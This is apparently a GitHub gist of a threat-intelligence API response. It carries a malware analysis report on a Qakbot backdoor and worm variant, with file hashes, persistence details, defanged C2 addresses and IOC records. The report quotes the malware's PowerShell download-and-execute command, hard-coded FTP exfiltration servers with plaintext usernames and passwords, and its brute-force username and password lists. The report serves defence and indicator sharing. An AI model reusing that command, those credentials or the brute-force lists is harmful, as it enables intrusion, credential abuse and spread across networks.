Skip to content

Instantly share code, notes, and snippets.

@nicdev
Created September 14, 2018 14:08
Show Gist options
  • Select an option

  • Save nicdev/c30228a8b71c75d4284cabefa4bbe887 to your computer and use it in GitHub Desktop.

Select an option

Save nicdev/c30228a8b71c75d4284cabefa4bbe887 to your computer and use it in GitHub Desktop.
[RFI] GET /reports/{report_id}
{
"reports": [
{
"title": "iris-1067-l2-analysis",
"media": {
"guid": "9e8b0e0795153f49073b8a25e4bc40e7",
"type": "media:news",
"property": "b8e921e9f0fc378c547b37821ba98678",
"secondary_property": {
"node:ndef": "5f4b0bf0ed0072194fa53b3c7dd6571c",
"tufo:form": "media:news",
"media:news": "b8e921e9f0fc378c547b37821ba98678",
"node:created": 1535567631809,
"media:news:org": "ibm",
"media:news:file": "e2a7b680394e5462cbb0b7bcd28d44f8",
"media:news:title": "demonstration report",
"media:news:author": "iris",
"media:news:summary": "report for tis translation",
"media:news:published": 0
},
"tags": {
"#mal.gen": 1535728699944,
"#int.content": 1535567631834,
"#int.tlp.publish": 1535726084339
},
"tag_tree": {
"#int": 1535567631819,
"#mal": 1535728699944,
"#int.tlp": 1535567631819,
"#mal.gen": 1535728699944,
"#int.content": 1535567631834,
"#int.tlp.publish": 1535726084339
},
"category": "malicious"
},
"iocs": [
[
{
"guid": "f8e2cdc5e0cfb0e8fae6ad12f9ba07dd",
"type": "inet:ipv4",
"property": "127.0.0.1",
"secondary_property": {
"inet:ipv4": "127.0.0.1",
"node:ndef": "cb046933fb8653200023f979db0b0173",
"tufo:form": "inet:ipv4",
"inet:ipv4:cc": "??",
"node:created": 1503693234191,
"inet:ipv4:asn": -1,
"inet:ipv4:type": "??"
},
"tags": {
"#int.tlp.white": 1512059049099,
"#omit.nonroutable": 1503693234261,
"#int.jira.iris.988": 1530636270687,
"#bhv.published.paloalto": 1512059330432,
"#bhv.published.kaspersky": 1512760470441,
"#bhv.published.secureworks": 1512755358081,
"#bookmark.shamoon.kaspersky.3": 1513276429163,
"#int.capsource.ibm.slack.synapse_bot": 1513187944000
},
"tag_tree": {
"#bhv": 1512059049099,
"#int": 1512059049099,
"#omit": 1503693234261,
"#int.tlp": 1512059049099,
"#bookmark": 1513276429163,
"#int.jira": 1530636270687,
"#bhv.published": 1512059049099,
"#int.capsource": 1513187944726,
"#int.jira.iris": 1530636270687,
"#int.tlp.white": 1512059049099,
"#bookmark.shamoon": 1513276429163,
"#omit.nonroutable": 1503693234261,
"#int.capsource.ibm": 1513187944726,
"#int.jira.iris.988": 1530636270687,
"#bhv.published.paloalto": 1512059330432,
"#bhv.published.kaspersky": 1512760470441,
"#int.capsource.ibm.slack": 1513187944726,
"#bhv.published.secureworks": 1512755358081,
"#bookmark.shamoon.kaspersky": 1513276429163,
"#bookmark.shamoon.kaspersky.3": 1513276429163,
"#int.capsource.ibm.slack.synapse_bot": 1513187944000
},
"category": "ignore"
}
],
[
{
"guid": "8a8406beec3fff3c2f906b1c76f4d77d",
"type": "inet:url",
"property": "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/",
"secondary_property": {
"inet:url": "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/",
"node:ndef": "16aafe5c5344acdcb56f3790ebe1602a",
"tufo:form": "inet:url",
"node:created": 1535568158054,
"inet:url:fqdn": "securityintelligence.com",
"inet:url:port": 443
},
"tags": {},
"tag_tree": {},
"category": "None"
}
],
[
{
"guid": "560f090debc513a17413a80e248cce4f",
"type": "inet:email",
"property": "backup_manager@garciasdrywall.com",
"secondary_property": {
"node:ndef": "c1efdba738c4f0817d01239075c30a58",
"tufo:form": "inet:email",
"inet:email": "backup_manager@garciasdrywall.com",
"node:created": 1535568183242,
"inet:email:fqdn": "garciasdrywall.com",
"inet:email:user": "backup_manager"
},
"tags": {},
"tag_tree": {},
"category": "None"
}
],
[
{
"guid": "8a285b974f0989c88172ca6fe8d039d1",
"type": "inet:email",
"property": "backup_manager@worldexpresscargo.com",
"secondary_property": {
"node:ndef": "df165913e47ef5a33ba291fc5cc6a65d",
"tufo:form": "inet:email",
"inet:email": "backup_manager@worldexpresscargo.com",
"node:created": 1535575922734,
"inet:email:fqdn": "worldexpresscargo.com",
"inet:email:user": "backup_manager"
},
"tags": {},
"tag_tree": {},
"category": "None"
}
],
[
{
"guid": "4f2e7372a6ed5430aba357d1c505afeb",
"type": "inet:email",
"property": "logger@ostergift.com",
"secondary_property": {
"node:ndef": "3aaa655715e977e9f10ee799f6720b11",
"tufo:form": "inet:email",
"inet:email": "logger@ostergift.com",
"node:created": 1535575947832,
"inet:email:fqdn": "ostergift.com",
"inet:email:user": "logger"
},
"tags": {},
"tag_tree": {},
"category": "None"
}
],
[
{
"guid": "bb32a4de3c9c65bfe601ed85eae28c26",
"type": "inet:email",
"property": "logger@grupocrepusculo.net",
"secondary_property": {
"node:ndef": "f02dcb473cdb9369972f2994568b1a21",
"tufo:form": "inet:email",
"inet:email": "logger@grupocrepusculo.net",
"node:created": 1535575978114,
"inet:email:fqdn": "grupocrepusculo.net",
"inet:email:user": "logger"
},
"tags": {},
"tag_tree": {},
"category": "None"
}
],
[
{
"guid": "3ea1ad1ff6cd681680d1b457d9124bee",
"type": "inet:email",
"property": "logger@trussedup.com",
"secondary_property": {
"node:ndef": "f6f8ad779d4b91a892883ae4f1fc57c1",
"tufo:form": "inet:email",
"inet:email": "logger@trussedup.com",
"node:created": 1535576030410,
"inet:email:fqdn": "trussedup.com",
"inet:email:user": "logger"
},
"tags": {},
"tag_tree": {},
"category": "None"
}
]
],
"report": "<!-- Analysis by: Mark Vincent Yason -->\r\n\r\n## Report Type\r\n\r\n* L2 - Full Analysis Report\r\n\r\n## File Hashes and File Size\r\n\r\n* MD5 : 451bbbf258a6fd0b93037b00fada1d3b\r\n* SHA1 : ae3addc7690fbb0bd6d96b890d4a8415b2211655\r\n* SHA256 : 79dcc8cd42b0eb0a26e3e248a3fe5960b5127eb0567ce331b98f7167176f026c\r\n* Size : 569,344 bytes\r\n\r\n## File Information\r\n\r\n* Win32 EXE\r\n\r\n## Malware Type\r\n\r\n* Backdoor, Network Worm\r\n\r\n## Functionality\r\n\r\n### Overview\r\n\r\n* Malware is a variant of the Qakbot family. This variant is capable of receiving commands from a remote attacker and also has the capability to spread by dropping a copy of itself into the network shares of target machines.\r\n\r\n### Installation\r\n\r\n* Upon execution, the malware drops and executes a copy of itself as `%APPDATA%\\Microsoft\\<SeededRandomString>\\<SeededRandomString>.exe`. Where `<SeededRandomString>` is generated by seeding a random number generator with a value based on the Windows product ID, machine name, volume serial number of drive C:, and the user name.\r\n\r\n* The malware also creates the data file `%APPDATA%\\Microsoft\\<SeededRandomString>\\<SeededRandomString>.dat` which contains RC4 encrypted system information such as machine name, volume serial number of drive C:, user name, and installation time.\r\n\r\n* The malware creates an autostart registry entry so that its dropped copy will be executed on system startup.\r\n\r\n* The malware replaces its originally executed copy with `C:\\Windows\\System32\\calc.exe` by executing the following command:\r\n ```\r\n cmd.exe /c ping.exe -n 6 127.0.0.1 & type \"C:\\Windows\\System32\\calc.exe\" > \"<MalwarePath>\"\r\n ```\r\n\r\n* The malware sets the following registry entry to disable the SpyNet reporting feature of Microsoft's antivirus product:\r\n ```\r\n HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Microsoft AntiMalware\\SpyNet\r\n SpyNetReporting = 0x00000000\r\n ```\r\n\r\n* The malware will contact the following URL via an HTTP GET request to report errors encountered in the installation (such as when mutexes with certain names are existing in the system):\r\n ```\r\n https://solo[.]mikebronsmusic[.]com/dupinst.php\r\n ```\r\n\r\n Example generated URL for the HTTP GET request:\r\n ```\r\n https://solo[.]mikebronsmusic[.]com/dupinst.php?n=hutiyb622407&bg=a&r=1\r\n ```\r\n\r\n### PowerShell Script Download Capability\r\n\r\n* The malware downloads and executes two PowerShell scripts. The downloading and execution of these two PowerShell scripts is performed by executing the following command:\r\n ```\r\n powershell.exe \"IEX (New-Object Net.WebClient).DownloadString('https://www[.]dropbox[.]com/s/41zf98knyy5atko/001_01.ps1?dl=1'); IEX (New-Object Net.WebClient).DownloadString('https://www[.]dropbox[.]com/s/dh8flnrogfq1h1w/001.ps1?dl=1'); Invoke-MainWorker -Command '%TEMP%\\<RandomString>.txt'\"\r\n ``` \r\n\r\n* As of writing, the PowerShell scripts are no longer available via the download URLs.\r\n\r\n### Backdoor Capability\r\n\r\n* Once installed in the system, the malware injects itself into a new `explorer.exe` process where it will perform its backdoor and worm functionalities. \r\n\r\n* The malware creates an event object named `uIjiFtq` once it is injected into the `explorer.exe` process.\r\n\r\n* The malware connects to and receive commands from hard-coded C2 servers via HTTPS. Upon initial connection, the malware sends the following information to the C2 server:\r\n\r\n * Protocol version (`protoversion` parameter), hard-coded to `15`\r\n * Generated bot ID (`n` parameter)\r\n * OS version (`os` parameter)\r\n * Qakbot version (`qv` parameter), hard-coded to `0322.358`\r\n\r\n The information sent is encrypted via RC4 and then encoded via base64. Example information sent (before the encryption and encoding):\r\n ```\r\n protoversion=15&r=1&n=fvwcxu376998&os=6.1.1.7600.0.0.0100&bg=b&it=2&qv=0322.358&ec=1528872599&av=0&salt=Qu83d1ZywmBlxg6MDp7O29EhuHhxj0uZQbhTP&arch=10&upt=6171\r\n ```\r\n\r\n* The malware also encrypts and uploads collected system information to hard-coded FTP servers. The collected system information includes the following:\r\n\r\n * Machine name\r\n * User name\r\n * OS version\r\n * Qakbot version\r\n * Installed applications\r\n\r\n### Network Worm Capability\r\n\r\n* Automatically or via the HTTP C2 command `13`, the malware will execute its network propagation routine which consists of the following:\r\n \r\n * Enumerate machines on the network.\r\n * Attempt to connect to the `IPC$` administrative share of target machines using the credentials of the affected user plus a combination of user names (enumerated from the target machine, enumerated from the domain controller, and a list of hard-coded usernames – see Appendix: Username List) and a set of passwords (derived from the user names and from a hard-coded list of passwords – see Appendix: Password List).\r\n * Upon successful connection, the malware enumerates the network shares of the target machine, drops a copy of itself to one of the network shares, and then creates and starts a service in the target machine to execute its dropped copy.\r\n * The brute force attempt to connect to target machines as described above is a potential reason for AD lockouts. See: https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/\r\n\r\n## Indicators\r\n\r\n### Network\r\n\r\n* Installation error report URL:\r\n ```\r\n https://solo[.]mikebronsmusic[.]com/dupinst.php\r\n ```\r\n\r\n* Downloaded PowerShell script URLs:\r\n ```\r\n https://www[.]dropbox[.]com/s/41zf98knyy5atko/001_01.ps1?dl=1\r\n https://www[.]dropbox[.]com/s/dh8flnrogfq1h1w/001.ps1?dl=1\r\n ```\r\n\r\n* Hard-coded C2 servers (via HTTPS on specific TCP ports):\r\n ```\r\n 50[.]42[.]189[.]206:993\r\n 98[.]16[.]70[.]197:2222\r\n 50[.]111[.]59[.]150:443\r\n 47[.]223[.]85[.]190:443\r\n 66[.]189[.]228[.]49:995\r\n 76[.]16[.]122[.]156:443\r\n 216[.]218[.]74[.]196:443\r\n 209[.]180[.]154[.]97:443\r\n 96[.]248[.]15[.]254:995\r\n 66[.]222[.]48[.]40:443\r\n 73[.]74[.]72[.]141:443\r\n 73[.]40[.]24[.]158:443\r\n 96[.]94[.]189[.]130:995\r\n 66[.]42[.]182[.]18:995\r\n 184[.]180[.]157[.]203:2222\r\n 216[.]21[.]168[.]27:32101\r\n 47[.]40[.]29[.]239:443\r\n 173[.]81[.]42[.]136:443\r\n 68[.]46[.]145[.]243:443\r\n 68[.]173[.]55[.]51:443\r\n 96[.]254[.]126[.]140:2222\r\n 74[.]88[.]210[.]56:995\r\n 65[.]116[.]179[.]83:443\r\n 70[.]118[.]18[.]242:443\r\n 207[.]178[.]109[.]161:443\r\n 65[.]173[.]74[.]217:2083\r\n 74[.]87[.]248[.]174:2222\r\n 98[.]242[.]248[.]219:443\r\n 65[.]40[.]207[.]151:995\r\n 70[.]169[.]12[.]141:443\r\n 47[.]157[.]103[.]78:2222\r\n 67[.]83[.]122[.]112:2222\r\n 216[.]16[.]14[.]19:443\r\n 189[.]175[.]114[.]33:443\r\n 216[.]201[.]159[.]118:443\r\n 185[.]219[.]83[.]73:443\r\n 71[.]120[.]176[.]61:443\r\n 96[.]85[.]138[.]153:443\r\n 71[.]190[.]202[.]120:443\r\n 47[.]221[.]46[.]163:443\r\n 98[.]103[.]2[.]226:443\r\n 24[.]100[.]46[.]201:2222\r\n 70[.]94[.]109[.]57:443\r\n 66[.]68[.]162[.]209:995\r\n 96[.]94[.]189[.]133:995\r\n 68[.]129[.]231[.]84:443\r\n 50[.]32[.]209[.]27:443\r\n 24[.]7[.]45[.]33:443\r\n 27[.]254[.]253[.]66:443\r\n 67[.]197[.]97[.]144:443\r\n 173[.]248[.]25[.]11:443\r\n 216[.]93[.]143[.]182:995\r\n 67[.]60[.]82[.]8:6881\r\n 96[.]73[.]55[.]193:993\r\n 24[.]228[.]185[.]224:2222\r\n 76[.]104[.]113[.]209:443\r\n 172[.]164[.]17[.]27:443\r\n 24[.]6[.]31[.]163:443\r\n 69[.]132[.]21[.]44:443\r\n 190[.]185[.]219[.]110:443\r\n 108[.]52[.]246[.]252:443\r\n 68[.]207[.]43[.]173:443\r\n 24[.]175[.]99[.]25:443\r\n 96[.]239[.]26[.]170:443\r\n 47[.]134[.]180[.]77:443\r\n 76[.]101[.]165[.]66:443\r\n 108[.]35[.]23[.]218:443\r\n 24[.]93[.]104[.]154:443\r\n 69[.]124[.]36[.]101:443\r\n 24[.]121[.]176[.]48:995\r\n 71[.]77[.]129[.]242:443\r\n 75[.]189[.]235[.]216:443\r\n 63[.]79[.]135[.]0:443\r\n 98[.]196[.]241[.]224:443\r\n 71[.]85[.]72[.]9:443\r\n 172[.]119[.]71[.]75:995\r\n 68[.]188[.]1[.]58:2078\r\n 216[.]21[.]168[.]27:50000\r\n 45[.]36[.]197[.]208:443\r\n 209[.]213[.]24[.]194:443\r\n 107[.]15[.]153[.]110:443\r\n 68[.]206[.]142[.]84:443\r\n 71[.]209[.]35[.]225:465\r\n 68[.]106[.]207[.]28:443\r\n 70[.]182[.]79[.]66:443\r\n 173[.]86[.]30[.]187:995\r\n 98[.]243[.]166[.]148:443\r\n 173[.]160[.]3[.]209:443\r\n 75[.]117[.]1[.]79:443\r\n 96[.]69[.]89[.]156:995\r\n 93[.]108[.]180[.]227:443\r\n 24[.]97[.]19[.]14:443\r\n 79[.]167[.]225[.]91:443\r\n 174[.]16[.]168[.]233:995\r\n 67[.]197[.]104[.]90:443\r\n 105[.]187[.]37[.]52:443\r\n 184[.]3[.]128[.]104:32103\r\n 184[.]2[.]61[.]132:443\r\n 65[.]191[.]128[.]99:443\r\n 50[.]206[.]74[.]2:80\r\n 24[.]12[.]126[.]189:443\r\n 67[.]60[.]82[.]8:50000\r\n 68[.]226[.]136[.]96:443\r\n 68[.]207[.]33[.]242:443\r\n 208[.]104[.]163[.]142:443\r\n 199[.]106[.]158[.]8:443\r\n 75[.]163[.]52[.]152:443\r\n 68[.]117[.]45[.]128:443\r\n 66[.]76[.]136[.]65:995\r\n 67[.]238[.]223[.]149:443\r\n 71[.]208[.]209[.]92:995\r\n 206[.]109[.]187[.]238:443\r\n 72[.]178[.]203[.]107:443\r\n 47[.]48[.]236[.]98:2222\r\n 66[.]68[.]139[.]10:443\r\n 50[.]198[.]141[.]161:2078\r\n 206[.]126[.]49[.]98:443\r\n 104[.]153[.]240[.]6:2222\r\n 72[.]133[.]86[.]147:2222\r\n 184[.]174[.]166[.]107:80\r\n 172[.]87[.]188[.]2:443\r\n 68[.]113[.]142[.]24:465\r\n 71[.]172[.]250[.]114:443\r\n 67[.]2[.]30[.]248:443\r\n 73[.]58[.]60[.]60:443\r\n 68[.]35[.]192[.]196:443\r\n 174[.]108[.]7[.]5:443\r\n 71[.]172[.]250[.]114:443\r\n 75[.]110[.]87[.]185:443\r\n 69[.]145[.]82[.]204:443\r\n 71[.]36[.]12[.]161:61200\r\n 71[.]48[.]218[.]91:995\r\n 75[.]106[.]233[.]194:443\r\n 97[.]78[.]121[.]82:443\r\n 144[.]163[.]35[.]83:443\r\n 65[.]169[.]66[.]123:2222\r\n 77[.]122[.]224[.]184:995\r\n 98[.]190[.]202[.]177:995\r\n 67[.]55[.]174[.]194:443\r\n 71[.]77[.]235[.]34:443\r\n 152[.]26[.]211[.]31:443\r\n 165[.]166[.]14[.]126:443\r\n 181[.]110[.]76[.]100:443\r\n 99[.]197[.]182[.]183:443\r\n 162[.]255[.]201[.]217:443\r\n 24[.]255[.]118[.]75:443\r\n 66[.]68[.]188[.]203:443\r\n 24[.]211[.]216[.]140:443\r\n 67[.]218[.]82[.]244:995\r\n 76[.]169[.]73[.]234:443\r\n ```\r\n\r\n* Hard-coded FTP servers (`server:username:password` combination):\r\n ```\r\n 37[.]60[.]244[.]211:backup_manager@garciasdrywall.com:4AsEzIaMwi2d\r\n 198[.]38[.]77[.]162:backup_manager@worldexpresscargo.com:kJm6DKVPfyiv\r\n 61[.]221[.]12[.]26:logger@ostergift.com:346HZGCMlwecz9S\r\n 67[.]222[.]137[.]18:logger@grupocrepusculo.net:p4a8k6fE1FtA3pR\r\n 107[.]6[.]152[.]61:logger@trussedup.com:RoP4Af0RKAAQ74V\r\n ```\r\n\r\n### File System\r\n\r\n* Dropped malware copy:\r\n ```\r\n %APPDATA%\\Microsoft\\<SeededRandomString>\\<SeededRandomString>.exe\r\n ```\r\n\r\n* RC4 encrypted data file created by the malware:\r\n ```\r\n %APPDATA%\\Microsoft\\<SeededRandomString>\\<SeededRandomString>.dat\r\n ```\r\n\r\n### Registry\r\n\r\n* Autostart registry entry:\r\n ```\r\n HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\n <RandomString> = <DroppedMalwareCopy>\r\n ```\r\n\r\n### Event Object\r\n\r\n* Name of event object created by the malware:\r\n ```\r\n uIjiFtq\r\n ```\r\n\r\n## Appendix\r\n\r\n### Appendix: Username List\r\n\r\n```\r\nadministrator,argo,operator,administrador,user,prof,owner,usuario,admin,HP_Administrator,HP_Owner,Compaq_Owner,Compaq_Administrator\r\n```\r\n\r\n### Appendix: Password List\r\n\r\n```\r\n123,password,Password,letmein,1234,12345,123456,1234567,12345678,123456789,1234567890,qwerty,love,iloveyou,princess,pussy,master,monkey,abc123,99999999,9999999,999999,99999,9999,999,99,9,88888888,8888888,888888,88888,8888,888,88,8,77777777,7777777,777777,77777,7777,777,77,7,66666666,6666666,666666,66666,6666,666,66,6,55555555,5555555,555555,55555,5555,555,55,5,44444444,4444444,444444,44444,4444,444,44,4,33333333,3333333,333333,33333,3333,333,33,3,22222222,2222222,222222,22222,2222,222,22,2,11111111,1111111,111111,11111,1111,111,11,1,00000000,0000000,00000,0000,000,00,0987654321,987654321,87654321,7654321,654321,54321,4321,321,21,12,super,secret,server,computer,owner,backup,database,lotus,oracle,business,manager,temporary,ihavenopass,nothing,nopassword,nopass,Internet,internet,example,sample,love123,boss123,work123,home123,mypc123,temp123,test123,qwe123,pw123,root123,pass123,pass12,pass1,admin123,admin12,admin1,password123,password12,password1,default,foobar,foofoo,temptemp,temp,testtest,test,rootroot,root,fuck,zzzzz,zzzz,zzz,xxxxx,xxxx,xxx,qqqqq,qqqq,qqq,aaaaa,aaaa,aaa,sql,file,web,foo,job,home,work,intranet,controller,killer,games,private,market,coffee,cookie,forever,freedom,student,account,academia,files,windows,monitor,unknown,anything,letitbe,domain,access,money,campus,explorer,exchange,customer,cluster,nobody,codeword,codename,changeme,desktop,security,secure,public,system,shadow,office,supervisor,superuser,share,adminadmin,mypassword,mypass,pass,Login,login,passwd,zxcvbn,zxcvb,zxccxz,zxcxz,qazwsxedc,qazwsx,q1w2e3,qweasdzxc,asdfgh,asdzxc,asddsa,asdsa,qweasd,qweewq,qwewq,nimda,administrator,Admin,admin,a1b2c3,1q2w3e,1234qwer,1234abcd,123asd,123qwe,123abc,123321,12321,123123,James,John,Robert,Michael,William,David,Richard,Charles,Joseph,Thomas,Christopher,Daniel,Paul,Mark,Donald,George,Kenneth,Steven,Edward,Brian,Ronald,Anthony,Kevin,Mary,Patricia,Linda,Barbara,Elizabeth,Jennifer,Maria,Susan,Margaret,Dorothy,Lisa,Nancy,Karen,Betty,Helen,Sandra,Donna,Carol,james,john,robert,michael,william,david,richard,charles,joseph,thomas,christopher,daniel,paul,mark,donald,george,kenneth,steven,edward,brian,ronald,anthony,kevin,mary,patricia,linda,barbara,elizabeth,jennifer,maria,susan,margaret,dorothy,lisa,nancy,karen,betty,helen,sandra,donna,carol,baseball,dragon,football,mustang,superman,696969,batman,trustno1\r\n```\r\n\r\n\r\n"
}
]
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment